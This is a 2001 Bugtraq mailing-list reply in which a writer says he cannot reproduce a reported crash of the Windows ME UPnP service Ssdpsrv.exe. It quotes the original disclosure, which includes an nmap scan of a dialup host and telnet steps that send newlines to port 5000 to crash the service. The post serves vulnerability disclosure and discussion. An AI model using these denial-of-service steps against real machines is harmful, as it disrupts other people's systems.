[22931] in bugtraq
Re: Ssdpsrv.exe in WindowsME
daemon@ATHENA.MIT.EDU (reso@securitywriters.org)
Sat Oct 20 11:13:35 2001
Envelope-To: <bugtraq@securityfocus.com>
Message-ID: <001801c1594e$4a138940$e1837ed4@mesh>
From: "~" <reso@securitywriters.org>
To: <bugtraq@securityfocus.com>
Date: Sat, 20 Oct 2001 11:02:10 +0100
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
One of my PCs runs Windows ME so I tried to replicate the crash but to no
avail.
I can send 3 newline commands then I get the "HTTP/1.1 400 Bad Request" but
Ssdpsrv.exe does not crash.
I know Microsoft aren't always that great at security but making a program
that crashes after 3 new line commands seems a little silly even for them
:-)
The ME install was a custom install and the service was running so I think
there's a definite link there.
Rob Mears
http://www.securitywriters.org
----- Original Message -----
From: "milo omega" <mtwoar@hotmail.com>
To: <bugtraq@securityfocus.com>
Sent: Thursday, October 18, 2001 1:46 AM
Subject: Ssdpsrv.exe in WindowsME
> By connecting to a computer running Ssdpsrv you are able to crash the
> Ssdpsrv server.
>
> Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes.
> This service comes standard with the WindowsME installation.
>
> The Ssdpsrv.exe server is started at boot.
> Here is the registry entry:
> KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersoin\RunServices
> Here is the file that starts the server:
> c:\windows\system\ssdpsrv.exe
>
> For information about UPnP go here:
> http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP
>
> Upon running a scan on a computer running the server I get the following:
> <snip>
> bash-2.05$ nmap -sT 165.121.234.217
> Starting nmap V. 2.54BETA29 ( www.insecure.org/nmap/ )
> Interesting ports on user-2injqmp.dialup.mindspring.com
(165.121.234.217):
> (The 1547 ports scanned but not shown below are in state: closed)
> Port State Service
> 139/tcp open netbios-ssn
> 5000/tcp open fics
> Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds
> </snap>
>
> Method to crash Ssdpsrv:
> Connect to the computer on port 5000.
> Send 3 to 5 newline characters.
> You then get an error and are disconnected.
> <snip>
> bash-2.05$ telnet 165.121.234.217 5000
> Trying 165.121.234.217...
> Connected to 165.121.234.217.
> Escape character is '^]'.
>
>
>
> HTTP/1.1 400 Bad Request
>
> Connection closed by foreign host.
> bash-2.05$
> </snap>
>
> Here is the error caused by the crash:
> Ssdpsrv has caused an error in MSVCRT.DLL.
> Ssdpsrv will now close.
> If you continue to experience problems,
> try restarting your computer.
>
> This causes the server crash and closes port 5000.
> Either you must restart the server by manually running ssdpsrv.exe
> or reboot.
>
> shouts to pulltheplug #c.
> :o
>
> _________________________________________________________________
> Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
>
